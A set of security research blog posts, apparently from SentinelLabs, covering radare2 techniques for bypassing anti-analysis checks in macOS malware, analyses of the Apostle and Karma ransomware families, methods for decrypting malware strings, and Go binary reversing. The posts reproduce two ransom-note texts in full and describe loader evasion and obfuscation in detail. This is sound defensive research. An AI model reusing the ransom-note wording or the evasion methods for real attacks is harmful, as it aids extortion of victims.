Viewing the sample’s visual graph horizontally

Here’s a quick summary of some useful commands (there are many more as you’ll see if you play around):

  • hjkl(arrow keys) – move the graph around
  • -/+0 – reduce, enlarge, return to default size
  • ‘ – toggle graph comments
  • tab/shift-tab – move to next/previous function
  • dr – rename function
  • q – back to visual mode
  • t/f – follow the true/false execution chain
  • u – go back
  • ? – help/available options

Hit once or twice make sure graph comments are on.
Use the tab key to move to the first function after main() (the border will be highlighted), where we can see an unnamed function and a reference in square brackets that begins with the letter ‘o’ (for example, [ob], though it may be different in your sample). Type the letters (without the square brackets) to go to that function. Type p to rotate between different display modes till you see something similar to the next image.

As we can see, this function call is actually a call to the standard C library function strcmp(), so let’s rename it.

Type dr and at the prompt type in the name you want to use and hit ‘enter’. Unsurprisingly, I’m going to call it strcmp.

To return to the main graph, type u and you should see that all references to that previously unnamed function now show strcmp, making things much clearer.

If you scroll through the graph (hjkl, remember) you will see many other unnamed functions that, once you explore them in the same way, are just relocations of standard C library calls such as exit, time, sleep, printf, malloc, srandom and more. I suggest you repeat the above exercise and rename as many as you can. This will both make the malware’s behaviour easier to understand and build up some valuable muscle-memory for working in r2!

Beating Anti-Analysis Without Patching

There are two approaches you can take to interrupt a program’s designed logic. One is to identify functions you want to avoid and patch the binary statically. This is fairly easy to do in r2 and there’s quite a few tutorials on how to patch binaries already out there. We’re not going to look at patching today because our entire objective is to run the sample dynamically, so we might as well interact with the program dynamically as well. Patching is really only worth considering if you need to create a sample for repeated use that avoids some kind of unwanted behaviour.

We basically have two easy options in terms of affecting control flow dynamically. We can either execute the function but manipulate the returned value (like put 0 in rax instead of 1) or skip execution of the function altogether.

We’ll see just how easy it is to do each of these, but we should first think about the different consequences of each choice based on the malware we’re dealing with.

If we NOP a function or skip over it, we’re going to lose any behaviour or memory states invoked by that function. If the function doesn’t do anything that affects the state of our program later on, this can be a good choice.

By the same token, if we execute the function but manipulate the value it returns, we may be allowing execution of code buried in that function that might trip us up. For example, if our function contains jumps to subroutines that do further anti-analysis tests, then we might get blocked before the parent function even returns, so this strategy wouldn’t help us. Clearly then, we need to take a look around the code to figure out which is the best strategy in each particular case.

Let’s take a look inside the _is_virtual_mchn function to see what it would do and work out our strategy.

If you’re still in Visual Graph mode, hit q to get back to the r2 prompt. Regardless of where you are, you can disassemble a function with pdf and the @ symbol and provide a flag or address. Remember, you can also use tab expansion to get a list of possible symbols.

It seems this function subtracts the sleep interval from the second timestamp, then compares it against the first timestamp. Jumping back out to how this result is consumed in main, it seems that if the result is not ‘0’, the malware calls exit() with ‘-1’.

The is_virtual_mchn function causes the malware to exit unless it returns ‘0’

The function appears to be somewhat misnamed as we don’t see the kind of tests that we would normally expect for VM detection. In fact, it looks like an attempt to evade automated sandboxes that patch the sleep function, and we’re not likely to fall foul of it just by executing in our VM. However, we can also see that the next function, user_info, also exits if it doesn’t return the expected value, so let’s practice both the techniques discussed above so that we can learn how to use the debugger whichever one we need to use.

Manipulating Execution with the radare2 Debugger

If you are at the command prompt, type Vp to go into radare2 visual mode (yup, this is another mode, and not the last!).

The Visual Debugger in radare2

Ooh, this is nice! We get registers at the top, and source code underneath. The current line where we’re stopped in the debugger is highlighted. If you don’t see that, hit uppercase S once (i.e., shift-s), which steps over one source line, and – in case you lose your way – also brings you back to the debugger view.

Let’s step smartly through the source with repeated uppercase S commands (by the way, in visual mode, lowercase ‘s’ steps in, whereas uppercase ‘S’ steps over). After a dozen or so rapid step overs, you should find yourself inside this familiar code, which is main().

main() in Visual Debugger mode

Note the highlighted dword, which is holding the value of argc. It should be ‘2’, but we can see from the register above that rdi is only 1. The code will jump over the next function call, which if you hit the ‘1’ key on the keyboard you can inspect (hit u to come back) and see this is a string comparison. Let’s continue stepping over and let the jump happen, as it doesn’t appear to block us. We’ll stop just short of the is_virtual_mchn function.

Seek and break locations are two different things!

We know from our earlier discussion what’s going to happen here, so let’s see how to take each of our options.

The first thing to note is that although the highlighted address is where the debugger is, that’s not where you are if you enter an r2 command prompt, unless it’s a debugger command. To see what I mean, hit the colon key to enter the command line.

From there, print out one line of disassembly with this command:

 > pd 1

Note that the line printed out is r2’s current seek position, shown at the top of the visual view. This is good. It means you can move around the program, seek to other functions and run other r2 commands without disturbing the debugger.

On the other hand, if you execute a debugger command on the command line it will operate on the source code where the debugger is currently parked, not on the current seek at the top of your view (unless they happen to be the same).

OK, let’s entirely skip execution of the _is_virtual_mchn function by entering the command line with : and then:

 > dss 2

Hit ‘return’ twice. As you can see, the dss command skips the number of source lines specified by the integer you gave it, making it a very easy way to bypass unwanted code execution!

Alternatively, if we want to execute the function then manipulate the register, stop the debugger on the line where the register is compared, and enter the command line again. This time, we can use dr to both inspect and write values to our chosen register.

> dr eax // see eax’s current value
> dr eax = 0 // set eax to 0
> drr // view all the registers
> dro // see the previous values of the registers
Viewing and changing register values

And that, pretty much, is all you need to defeat anti-analysis code in terms of manipulating execution. Of course, the fun part is finding the code you need to manipulate, which is why we spent some time learning how to move around in radare2 in both visual graph mode and visual mode. Remember that in either mode you can get back to the regular command prompt by hitting q. As a bonus, you might play around with hitting p and tab when in the visual modes.

At this point, what I suggest you do is go back to the list of functions we identified at the beginning of the post and see what they do, and whether it’s best to skip them or modify their return values (or whether either option will do). You might want to look up the built-in help for listing and setting breakpoints (from a command prompt, try db?) to move quickly through the code. By the time you’ve done this a few times, you’ll be feeling pretty comfortable about tackling other samples in radare2’s debugger.


If you’re starting to see the potential power of r2, I strongly suggest you read the free online radare2 book, which will be well worth investing the time in. By now you should be starting to get the feel of r2 and exploring more on your own with the help of the ? and other resources. As we go into further challenges, we’ll be spending less time going over the r2 basics and digging more into the actual malware code.

In the next part of our series, we’re going to start looking at one of the major challenges in reversing macOS malware that you are bound to face on a regular basis: dealing with encrypted and obfuscated strings. I hope you’ll join us there and practice your r2 skills in the meantime!

New Version Of Apostle Ransomware Reemerges In Targeted Attack On Higher Education

30 September 2021 at 16:20

SentinelLabs has been tracking the activity of Agrius, a suspected Iranian threat actor operating in the Middle East, throughout 2020 and 2021 following a set of destructive attacks starting December 2020. Since we last reported on this threat actor in May 2020, Agrius lowered its profile and was not observed conducting destructive activity. This changed recently as the threat actor likely initiated a ransomware attack on the Israeli university Bar-Ilan utilizing the group’s custom Apostle ransomware.

Although the full technical details of the incident were not disclosed publicly, some information was released to the public, most notably the ransom demand text file dropped on victim machines. The .txt file matches that from a new version of Apostle compiled on August 15, 2021, the day of the attack.

The new version of Apostle is obfuscated, encrypted and compressed as a resource in a loader we call Jennlog, as it attempts to masquerade payload in resources as log files. Before executing the Apostle payload, Jennlog runs a set of tests to verify that it is not being executed in an analysis environment based on an embedded configuration. Following the analysis of the Jennlog loader, SentinelLabs retrieved an additional variant of Jennlog, used to load and run OrcusRAT.

Jennlog Analysis

Jennlog (5e5e526a69490399494dcd7195bb6c67) is a .NET loader that deobfuscates, decompresses and decrypts a .NET executable from a resource embedded within the file. The resources within the loader appear to look like log files, and it contains both the binary to run as well as a configuration for the malware’s execution.

Jennlog attempts to extract two different resources:

  • – stores Apostle payload and the configuration.
  • helloworld.Certificate.txt – contains None. If configured to do so, the malware compares the MD5 value of the system information (used as system fingerprint) to the contents of this resource.

The payload hidden in “” appears to look like a log file at first sight:

Contents of “” resource embedded within Jennlog

The payload is extracted from the resource by searching for a separator word – “Jennifer”. Splitting the contents of the resource results in an array of three strings:

  1. Decoy string – Most likely there to make the log file look more authentic.
  2. Configuration string – Used to determine the configuration of the malware execution.
  3. Payload – An obfuscated, compressed and encrypted file.


The configuration of Jennlog consists of 13 values, 12 of which are actually used in this version of the malware. In the variants we were able to retrieve, all of these flags are set to 0.

Jennlog configuration values

One of the most interesting flags found here is the certificate flag. If this flag is set, it will cause the malware to run only on a specific system. If this system does not match the configured MD5 fingerprint, the malware either stops operation or deletes itself utilizing the function ExecuteInstalledNodeAndDelete(), which creates and runs a BAT file as observed in other Agrius malware.

Jennlog ExecuteInstalledNodeAndDelete() function

Following all the configuration based-checks, Jennlog continues to unpack the main binary from within the resource “” by performing the following string manipulations in the function EditString() on the obfuscated payload:

  • Replace all “\nLog” with “A”.
  • Reverse the string.
  • Remove all whitespaces.

This manipulation will result in a long base64-encoded deflated content, which is inflated using the function stringCompressor.Unzip(). The inflated content highly resembles the contents of the original obfuscated payload, and it is deobfuscated again using the EditString() function.

The deobfuscation of the inflated content is carried out in a rather peculiar way, being run as a “catch” statement after attempting to turn a string containing a URL to int, which will always result in an error. The domain presented in the URL was never bought, and highly resembles other Agrius malware unpurchased domains, often used as “Super Relays”. Here, however, the domain is not actually contacted.

Execution of EditString() function as a catch statement

Following a second run of the EditString() function, Jennlog decodes the extracted content and decrypts it using an implementation of RC4 with a predefined key. The extracted content found in this sample is a new version of the Apostle ransomware, which is loaded into memory and ran using the parameters given to Jennlog at execution.

Apostle Ransomware Analysis

The new variant of Apostle (cbdbda089f7c7840d4daed22c34969fd876315b6) embedded within the Jennlog loader was compiled on August 15, 2021, the day the attack on Bar-Ilan university was carried out. Its execution flow is highly similar to the variant described in previous reports, and it even checks for the same Mutex as the previous ransomware variant.

The message embedded within it, however, is quite different:

Ooops, Your files are encrypted!!! Don't worry,You can return all your files! 
If you want to restore theme, Send $10000 worth of Monero to following address :  
Then follow this Telegram ID :  hxxps://t[.]me/x4ran

This is the exact same message that was released to the media in the context of the Bar-Ilan ransomware incident, as reported on ynet:

Ransom demand text file as seen in Bar-Ilan university

Other than the ransom demand note, the wallpaper picture used on affected machines was also changed, this time presenting an image of a clown:

New Apostle variant wallpaper image

OrcusRAT Jennlog Loader

An additional variant of Jennlog (43b810f918e357669be42030a1feb727) was uploaded to VirusTotal on July 14, 2021 from Iran. This variant is highly similar to the one used to load Apostle, and contains a similar configuration scheme (all set to 0). It is used to load a variant of OrcusRAT, which is extracted from the files resources in a similar manner.

The OrcusRAT variant (add7b6b60e746c36a66f5ec233873372) extracted from within it was submitted to VT on June 20, 2021 using the same submitter ID from Iran. It seems to connect to an internal IP address –, indicating it might have been used for testing. It also contained the following PDB path:



Agrius has shown a willingness to strategically wipe systems and has continued to evolve its toolkit to enable ransomware operations. At this time, we don’t know if the actor is committed to financially-motivated operations, but we do know the original intent was sabotage. We expect the sort of subterfuge seen here to be deployed in future Agrius operations. SentinelLabs continues to track the development of this nascent threat actor.

Technical Indicators

Jennlog Loader (Apostle Loader)

  • 5e5e526a69490399494dcd7195bb6c67
  • c9428afa269bbf8c48a08a7109c553163d2051e7
  • 0ba324337b1d76a5afc26956d4dc9f57786483230112eaead5b5c92022c089c7

Apostle – Bar-Ilan variant

  • fc8221382521a40ec0042431a947a3ca
  • cbdbda089f7c7840d4daed22c34969fd876315b6
  • 44c13c46d4f597ea0625f1c87eecffe3cd5dcd257c5fac18a6fa931ba9b5f97a

Jennlog Loader (OrcusRAT Loader)

  • 43b810f918e357669be42030a1feb727
  • 3de36410a99cf3bd8e0c56fdeafa32bbf7625af1
  • 14659857df1753f720ac797a43a9c3f3e241c3df762de7f50bbbae00feb818c9


  • add7b6b60e746c36a66f5ec233873372
  • a35bffc49871bb3a48bdd35b4a4d04d208f23487
  • 069686119adc13e1785cb7a425611d1ec13f33ae75962a7e50e00414209d1809

Techniques for String Decryption in macOS Malware with Radare2

12 October 2021 at 17:52

If you’ve been following this series so far, you’ll have a good idea how to use radare2 to quickly triage a Mach-O binary statically and how to move through it dynamically to beat anti-analysis attempts. But sometimes, no matter how much time you spend looking at disassembly or debugging, you’ll hit a roadblock trying to figure out your macOS malware sample’s most interesting behavior because much of the human-readable ‘strings’ have been rendered unintelligible by encryption and/or obfuscation.

That’s the bad news; the good news is that while encryption is most definitely hard, decryption is, at least in principle, somewhat easier. Whatever methods are used, at some point during execution the malware itself has to decrypt its code. This means that, although there are many different methods of encryption, most practical implementations are amenable to reverse engineering given the right conditions.

Sometimes, we can do our decryption statically, perhaps emulating the malware’s decryption method(s) by writing our own decryption logic(s). Other times, we may have to run the malware and extract the strings as they are decrypted in memory. We’ll take a practical look at using both of these techniques in today’s post through a series of short case studies of real macOS malware.

First, we’ll look at an example of AES 128 symmetric encryption used in the recent macOS.ZuRu malware and show you how to quickly decode it; then we’ll decrypt a Vigenère cipher used in the WizardUpdate/Silver Toucan malware; finally, we’ll see how to decode strings dynamically, in-memory while executing a sample of a notorious adware installer.

Although we cannot cover all the myriad possible encryption schemes or methods you might encounter in the wild, these case studies should give you a solid basis from which to tackle other encryption challenges. We’ll also point you to some further resources showcasing other macOS malware decryption strategies to help you expand your knowledge.

For our case studies, you can grab a copy of the malware samples we’ll be using from the following links:

  1. macOS.ZuRu pwd:infect3d
  2. WizardUpdate
  3. Adware Installer

Don’t forget to use an isolated VM for all this work: these are live malware samples and you do not want to infect your personal or work device!

Breaking AES Encryption in macOS.ZuRu

Let’s begin with a recent strain of new macOS malware dubbed ‘macOS.ZuRu’. This malware was distributed inside trojanized applications such as iTerm, MS Remote Desktop and others in September 2021. Inside the malware’s application bundle is a Frameworks folder containing the malicious libcrypto.2.dylib. The sample we’re going to look at has the following hash signatures:

md5 b5caf2728618441906a187fc6e90d6d5
sha1 9873cc929033a3f9a463bcbca3b65c3b031b3352
sha256 8db4f17abc49da9dae124f5bf583d0645510765a6f7256d264c82c2b25becf8b

Let’s load it into r2 in the usual way (if you haven’t read the earlier posts in this series, catch up here and here), and consider the simple sequence of reversing steps illustrated in the following images.

Getting started with our macOS.ZuRu sample

As shown in the image above, after loading the binary, we use ii to look at the imports, and see among them CCCrypt (note that I piped this to head for display purposes). We then do a case insensitive search on ‘crypt’ in the functions list with afll~+crypt.

If we add [0] to the end of that, it gives us just the first column of addresses. We can then do a for-each over those using backticks to pipe them into axt to grab the XREFS. The entire command is:

> axt @@=`afll~crypt[0]`

The result, as you can see in the lower section of the image above, shows us that the malware uses CCCrypt to call the AESDecrypt128 block cipher algorithm.

AES128 requires a 128-bit key, which is the equivalent of 16 bytes. Though there’s a number of ways that such a key could be encoded in malware, the first thing we should do is a simple check for any 16 byte strings in the binary.

To do that quickly, let’s pipe the binary’s strings through awk and filter on the len column for ‘16’: That’s the fourth column in r2’s iz output. We’ll also narrow down the output to just cstrings by grepping on ‘string’, so our command is:

> iz | awk ‘$4==16’ | grep string

We can see the output in the middle section of the following image.

Filtering the malware’s strings for possible AES 128 keys

We got lucky! There’s two occurrences of what is obviously not a plain text string. Of course, it could be anything, but if we check out the XREFS we can see that this string is provided as an argument to the AESDecrypt method, as illustrated in the lower section of the above image.

All that remains now is to find the strings that are being deciphered. If we get the function summary of AESDecrypt from the address shown in our last command, 0x348b, it reveals that the function is using base64 encoded strings.

> pds @ 0x348b
Grabbing a function summary in r2 with the pds command

A quick and dirty way to look for base64 encoded strings is to grep on the “=” sign. We’ll use r2’s own grep function, ~ and pipe the result of that through another filter for “str” to further refine the output.

> iz~=~str
A quick-and-dirty grep for possible base64 cipher strings

Our search returns three hits that look like good candidates, but the proof is in the pudding! What we have at this point is candidates for:

  1. the encryption algorithm – AES128
  2. the key – “quwi38ie87duy78u”
  3. three ciphers – “oPp2nG8br7oIB+5wLoA6Bg==, …”

All we need to do now is to run our suspects through the appropriate decryption routine for that algorithm. There are online tools such as Cyber Chef that can do that for you, or you can find code for most popular algorithms for your favorite language from an online search. Here, we implemented our own rough-and-ready AES128 decryption algorithm in Go to test out our candidates:

A simple AES128 ECB decryption algorithm implemented in Go

We can pipe all the candidate ciphers to file from within r2 and then use a shell one-liner in a separate Terminal window to run each line through our Go decryption script with the candidate key.

Revealing the strings in clear text with our Go decrypter

And voila! With a few short commands in r2 and a bash one-liner, we’ve decrypted the strings in macOS.ZuRu and found a valuable IoC for detection and further investigation.

Decoding a Vigenère Cipher in WizardUpdate Malware

In our second case study, we’re going to take a look at the string encryption used in a recent sample of WizardUpdate malware. The sample we’ll look at has the following hash signatures:

md5 0c91ddaf8173a4ddfabbd86f4e782baa
sha1 3c224d8ad6b977a1899bd3d19d034418d490f19f
sha256 73a465170feed88048dbc0519fbd880aca6809659e011a5a171afd31fa05dc0b

We’ll follow the same procedure as last time, beginning with a case insensitive search of functions with “crypt” in the name, filtering the results of that down to addresses, and getting the XREFS for each of the addresses. This is what it looks like on our new sample:

Finding our way to the string encryption code from the function analysis

We can see that there are several calls from main to a decrypt function, and that function itself calls sym.decrypt_vigenere.

Vigenère is a well-known cipher algorithm which we will say a bit more about shortly, but for now, let’s see if we can find any strings that might be either keys or ciphers.

Since a lot of the action is happening in main, let’s do a quick pds summary on the main function.

Using pds to get a quick summary of a function

There are at least two strings of interest. Let’s take a better look by leveraging r2’s afns command, which lists all strings associated with the current function.

r2’s afns can help you isolate strings in a function

That gives us a few more interesting looking candidates. Given its length and form, my suspicion at this point is that the “LBZEWWERBC” string is likely the key.

We can isolate just the strings we want by successive filtering. First, we get just the rows we want:

> afns~:1..5

And then grab just the last column (ignoring the addresses):

> afns~:1..5[2]

Then using sed to remove the “str.” prefix and grep to remove the “{MAID}” string, we end up with:

Access to the shell in r2 makes it easy to isolate the strings of interest

As before, we can now pipe these out to a “ciphers” file.

> afns~:1..5[2] | grep -v MAID | sed ‘s/str.//g’ > ciphers

Let’s next turn to the encryption algorithm. Vigenère has a fascinating history. Once thought to be unbreakable, it’s now considered highly insecure for cryptography. In fact, if you like puzzles, you can decrypt a Vigenère cipher with a manual table.

The Vigenère cipher was invented before computers and can be solved by hand

One of the Vigenère cipher’s weaknesses is that it’s possible to discern patterns in the ciphertext that can reveal the length of the key. That problem can be avoided by encrypting a base64 encoding of the plain text rather than the plain text itself.

Now, if we jump back into radare2, we’ll see that WizardUpdate does indeed decode the output of the Vigenère function with a base64 decoder.

WizardUpdate malware uses base64 encoding either side of encrypting/decrypting

There is one other thing we need to decipher a Vigenère cipher aside from the key and ciphertext. We also need the alphabet used in the table. Let’s use another r2 feature to see if it can help us find it. Radare2’s search function, /, has some crypto search functionality built in. Use /c? to view the help on this command.

Search for crypto materials with built-in r2 commands

The /ck search gives us a hit which looks like it could function as the Vigenère alphabet.

OK, it’s time to build our decoder. This time, I’m going to adapt a Python script from here, and then feed it our ciphers file just as before. The only differences are I’m going to hardcode the alphabet in the script and then run the output through base64. Let’s see how it looks.

Decoding the strings returns base64 as expected

So far so good. Let’s try running those through base64 -D (decode) and see if we get our plain text.

Our decoder returns gibberish after we try to decode the base64

Hmm. The script runs without error, but the final decoded base64 output is gibberish. That suggests that while our key and ciphers are correct, our alphabet might not be.

Returning to r2, let’s search more widely across the strings with iz~string

Finding cstrings in the TEXT section with r2’s ~ filter

The first hit actually looks similar to the one we tried, but with fewer characters and a different order, which will also affect the result in a Vigenère table. Let’s try again using this as the hardcoded alphabet.

Decoding the WizardUpdate’s encrypted strings back to plain text

Success! The first cipher turns out to be an encoding of the system_profiler command that returns the device’s serial number, while the second contains the attacker’s payload URL. The third downloads the payload and executes it on the victim’s device.

Reading Encrypted Strings In-Memory

Reverse engineering is a multi-faceted puzzle, and often the pieces drop into place in no particular order. When our triage of a malware sample suggests a known or readily identifiable encryption scheme has been used as we saw with macOS.ZuRu and WizardUpdate, decrypting those strings statically can be the first domino that makes the other pieces fall into place.

However, when faced with an incalcitrant sample on which the authors have clearly spent a great deal of time second-guessing possible reversing moves, a ‘cheaper’ option is to detonate the malware and observe the strings as they are decrypted in memory. Of course, to do that, you might need to defeat some anti-analysis and anti-debugging tricks first!

In our third case study, then, we’re going to take a look at a common adware installer. Adware is big business, employs lots of professional coders, and produces code that is every bit as crafty as any sophisticated malware you’re likely to come across. If you spend anytime dealing with infected Macs, coming across adware is inevitable, so knowing how to deal with it is essential.

md5 cfcba69503d5b5420b73e69acfec56b7
sha1 e978fbcb9002b7dace469f00da485a8885946371
sha256 43b9157a4ad42da1692cfb5b571598fcde775c7d1f9c7d56e6d6c13da5b35537

Let’s dump this into r2 and see what a quick triage can tell us.

This sample is keeping its secrets

Well, not much! If we print the disassembly for the main function with pdf @main, we see a mass of obfuscated code.

Lots of obfuscated code in this adware installer

However, the only calls here are to system and remove, as we saw from the function list. Let’s quit and reopen in r2’s debugger mode (remember: you may need to chmod the sample and remove any code signature and extended attributes as explained here).

sudo r2 -AA -d 43b9157a4ad42da1692cfb5b571598fcde775c7d1f9c7d56e6d6c13da5b35537

Let’s find the entrypoint with the ie command. We’ll set a breakpoint on that and then execute to that point.

Breaking on the entrypoint

Now that we’re at main, let’s break on the system call and take a look at the registers. To do that, first get the address of the system flag with

> f~system

Then set the breakpoint on the address returned with the db command. We can continue execution with dc.

Setting a breakpoint on the system call and continuing execution

Note that in the image above, our first attempt to continue execution results in a warning message and we actually hit our main breakpoint again. If this happens, repeating the dc command should get you past the warning. Now we can look at all the registers with drr.

Revealing the encoded strings in memory

At the rdi register, we can see the beginning of the decrypted string. Let’s see the rest of it.

The clear text is revealed in the rdi register

Ah, an encoded shell script, typical of Bundlore and Shlayer malware. One of my favorite things about r2 is how you can do a lot of otherwise complex things very easily thanks to the shell integration. Want to pretty-print that script? Just pipe the same command through sed from right within r2.

> ps 2048 @rdi | sed ‘s/;/\n/g’

We can easily format the output by piping it through the sed utility

More Examples of macOS String Decryption Techniques

WizardUpdate and macOS.ZuRu provided us with some real-world malware samples where we could use the same general technique: identify the encryption algorithm in the functions table, search for and isolate the key and ciphers in the strings, and then find or implement an appropriate decoding algorithm.

Some malware authors, however, will implement custom encryption and decryption schemes and you’ll have to look more closely at the code to see how the decryption routine works. Alternatively, where necessary, we can detonate the code, jump over any anti-analysis techniques and read the decrypted strings directly from memory.

If all this has piqued your interest in string encryption techniques used in macOS malware, then you might like to check out some or all of the following for further study.

EvilQuest, which we looked at in the previous post, is one example of malware that uses a custom encryption and decryption algorithm. SentinelLabs broke the encryption statically, and then created a tool based on the malware’s own decryption algorithm to decrypt any files locked by the malware. Fellow macOS researcher Scott Knight also published his Python decryption routine for EvilQuest, which is worth close study.

Adload is another malware that uses a custom encryption scheme, and for which researchers at Confiant also published decryption code.

Notorious adware dropper platforms Bundlore and Shlayer use a complex and varying set of shell obfuscation techniques which are simple enough to decode but interesting in their own right.

Likewise, XCodeSpy uses a simple but quite effective shell obfuscation trick to hide its strings from simple search tools and regex pattern matches.


In this post, we’ve looked at a variety of different encryption techniques used by macOS malware and how we can tackle these challenges both statically and dynamically. If you haven’t checked out the previous posts in this series, have a look Part 1 and Part 2. I hope you’ll join us for the next post in this series as we continue to look at common challenges facing macOS malware researchers.

Karma Ransomware | An Emerging Threat With A Hint of Nemty Pedigree

18 October 2021 at 16:43

Karma is a relatively new ransomware threat actor, having first been observed in June of 2021. The group has targeted numerous organizations across different industries. Reports of a group with the same name from 2016 are not related to the actors currently using the name. An initial technical analysis of a single sample related to Karma was published by researchers from Cyble in August.

In this post, we take a deeper dive, focusing on the evolution of Karma through multiple versions of the malware appearing through June 2021. In addition, we explore the links between Karma and other well known malware families such as NEMTY and JSWorm and offer an expanded list of technical indicators for threat hunters and defenders.

Initial Sample Analysis

Karma’s development has been fairly rapid and regular with updated variants and improvements, oftentimes building multiple versions on the same day. The first few Karma samples our team observed were:

Sample 1: d9ede4f71e26f4ccd1cb96ae9e7a4f625f8b97c9
Sample 2: a9367f36c1d2d0eb179fd27814a7ab2deba70197
Sample 3: 9c733872f22c79b35c0e12fa93509d0326c3ec7f

Sample 1 was compiled on 18th, June 2021 and Samples 2 and 3 the following day on the 19th, a few minutes apart. Basic configuration between these samples is similar, though there are some slight differences such as PDB paths.

After Sample 1, we see more of the core features appear, including the writing of the ransom note. Upon execution, these payloads would enumerate all local drives (A to Z) , and encrypt files where possible.

Further hunting revealed a number of other related samples all compiled within a few days of each other. The following table illustrates compilation timestamps and payload size across versions of Karma compiled in a single week. Note how the payload size decreases as the authors’ iterate.

Ransom Note is not Created in Sample 1.

Also, the list of excluded extensions is somewhat larger in Sample 1 than in both Samples 2 and 3, and the list of extensions is further reduced from Sample 5 onwards to only exclude “.exe”, “.ini”, “.dll”, “.url” and “.lnk”.

The list of excluded extensions is reduced as the malware authors iterate

Encryption Details

From Sample 2 onwards, the malware calls CreateIoCompletionPort, which is used for communication between the main thread and a sub thread(s) handling the encryption process. This specific call is key in managing efficiency of the encryption process (parallelization in this case).

Individual files are encrypted by way of a random Chacha20 key. Once files are encrypted, the malware will encrypt the random Chacha20 key with the public ECC key and embed it in the encrypted file.

Chacha Encryption

Across Samples 2 to 5, the author removed the CreateIoCompletionPort call, instead opting to create a new thread to manage enumeration and encryption per drive. We also note the “KARMA” mutex created to prevent the malware from running more than once. Ransom note names have also been updated to “KARMA-ENCRYPTED.txt”.

Diving in deeper, some samples show that the ChaCha20 algorithm has been swapped out for Salsa20. The asymmetric algorithm (for ECC) has been swapped from Secp256k1 to Sect233r1. Some updates around execution began to appear during this time as well, such as support for command line parameters.

A few changes were noted in Samples 6 and 7. The main difference is the newly included background image. The file “background.jpg” is written to %TEMP% and set as the Desktop image/wallpaper for the logged in user.

Desktop image change and message

Malware Similarity Analysis

From our analysis, we see similarities between JSWorm and the associated permutations of that ransomware family such as NEMTY, Nefilim, and GangBang. Specifically, the Karma code analyzed bears close similarity to the GangBang or Milihpen variants that appeared around January 2021.

Some high-level similarities are visible in the configurations.

We can see deeper relationships when we conduct a bindiff on Karma and GangBang samples. The following image shows how similar the main() functions are:

The main() function & argument processing in Gangbang (left) and Karma

Victim Communication

The main body of the ransom note text hasn’t changed since the first sample and still contains mistakes. The ransom notes are base64-encoded in the binary and dropped on the victim machine with the filename “KARMA-AGREE.txt” or, in later samples, “KARMA-ENCRYPTED.txt”.

Your network has been breached by Karma ransomware group.
We have extracted valuable or sensitive data from your network and encrypted the data on your systems.
Decryption is only possible with a private key that only we posses.
Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.
Scamming is just bad for business in this line of work.
Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.
We advise you not to use any data recovery tools without leaving copies of the initial encrypted file.
You are risking irreversibly damaging the file by doing this.
If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.

If a ransom is payed we will provide the decryption key and proof that we deleted you data.
When you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.

How to contact us:

{[email protected]}
{[email protected]}
{[email protected]}

Each sample observed offers three contact emails, one for each of the mail providers onionmail, tutanota, and protonmail. In each sample, the contact emails are unique, suggesting they are specific communication channels per victim. The notes contain no other unique ID or victim identifier as sometimes seen in notes used by other ransomware groups.

In common with other operators, however, the Karma ransom demand threatens to leak victim data if the victim does not pay. The address of a common leaks site where the data will be published is also given in the note. This website page appears to have been authored in May 2021 using WordPress.

The Karma Ransomware Group’s Onion Page


Karma is a young and hungry ransomware operation. They are aggressive in their targeting, and show no reluctance in following through with their threats. The apparent similarities to the JSWorm family are also highly notable as it could be an indicator of the group being more than they appear. The rapid iteration over recent months suggests the actor is investing in development and aims to be around for the foreseeable future. SentinelLabs continues to follow and analyze the development of Karma ransomware.

Indicators of Compromise

Karma Ransomware

Sample 1: d9ede4f71e26f4ccd1cb96ae9e7a4f625f8b97c9
Sample 2: a9367f36c1d2d0eb179fd27814a7ab2deba70197
Sample 3: 9c733872f22c79b35c0e12fa93509d0326c3ec7f
Sample 4: c4cd4da94a2a1130c0b9b1bf05552e06312fbd14
Sample 5: bb088c5bcd5001554d28442bbdb144b90b163cc5
Sample 6: 5ff1cd5b07e6c78ed7311b9c43ffaa589208c60b
Sample 7: 08f1ef785d59b4822811efbc06a94df16b72fea3
Sample 8: b396affd40f38c5be6ec2fc18550bbfc913fc7ea

Gangbang Sample 

Karma Desktop image

Victim Blog (TOR)

Ransom Note Email Addresses
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

T1485 Data Destruction
T1486 Data Encrypted for Impact
T1012 Query Registry
T1082 System Information Discovery
T1120 Peripheral Device Discovery
T1204 User Execution
T1204.002 User Execution: Malicious File

AlphaGolang | A Step-by-Step Go Malware Reversing Methodology for IDA Pro

21 October 2021 at 14:12

The increasing popularity of Go as a language for malware development is forcing more reverse engineers to come to terms with the perceived difficulties of analyzing these gargantuan binaries. The language offers great benefits for malware developers: portability of statically-linked dependencies, speed of simple concurrency, and ease of cross-compilation. On the other hand, for analysts, it’s meant learning the inadequacies of our tooling and contending with a foreign programming paradigm. While our tooling has generally improved, the perception that Go binaries are difficult to analyze remains. In an attempt to further dispel that myth, we’ve set out to share a series of scripts that simplify the task of analyzing Go binaries using IDA Pro with a friendly methodology. Our hope is that members of the community will feel inspired to share additional resources to bolster our collective analysis powers.

A Quick Intro to the Woes of Go Binary Analysis

Go binaries present multiple peculiarities that make our lives a little harder. The most obvious is their size. Due to the approach of statically-linking dependencies, the simplest Go binary is multiple megabytes in size and one with proper functionality can figure in the 15-20mb range. The binaries are then easily stripped of debug symbols and can be UPX packed to mask their size quite effectively. That bulky size entails a maze of standard code to confuse reverse engineers down long unproductive rabbit holes, steering them away from the sparse user-generated code that implements the actual functionality.

Hello World source code
Mach-o binary == 2.0mb
UPX compressed == 1.1mb

To make things worse, Go doesn’t null-terminate strings. The linker places strings in incremental order of length and functions load these strings with a reference to a fixed length. That’s a much safer implementation but it means that even a cursory glance at a Go binary means dealing with giant blobs of unrelated strings.

“Hello World!” string lost in a sea of unrelated strings.

Even the better disassemblers and decompilers tend to display these unparsed string blobs confusing their intended purpose.

Autoanalysis output

Manually fixed disassembly

That’s without getting into the complexities of recovering structures, accurately portraying function types, interfaces, and channels, or properly tracing argument references.

